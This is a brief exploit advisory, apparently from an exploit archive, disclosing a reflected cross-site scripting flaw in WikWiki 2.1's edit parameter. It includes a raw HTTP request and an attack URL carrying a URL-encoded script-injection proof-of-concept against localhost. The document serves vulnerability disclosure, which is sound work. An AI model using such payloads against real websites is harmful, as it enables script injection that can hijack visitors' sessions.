Home / os / winmobile

WikWiki 2.1 Cross Site Scripting

Posted on 03 August 2016

# Exploit Title: WikWiki - Reflected XSS
# Date: 2016-08-01
# Exploit Author: HaHwul
# Vendor Homepage: https://github.com/smasty/WikWiki
# Software Link: https://github.com/smasty/WikWiki/archive/master.zip
# Version: v2.1
# Tested on: Debian[Whezzy]
# CVE : none

### Vulnerability Point
Edit page is not filtered special char.
Inject html code on root directory and edit parameter.

### Attack Request
GET /?edit=55596317%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E94fd7 HTTP/1.1
Host: 127.0.0.1
...snip..

### Attack URL
http://127.0.0.1/vul_test/WikWiki/?edit=55596317%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E94fd7

 

TOP

Malware :

Exploits :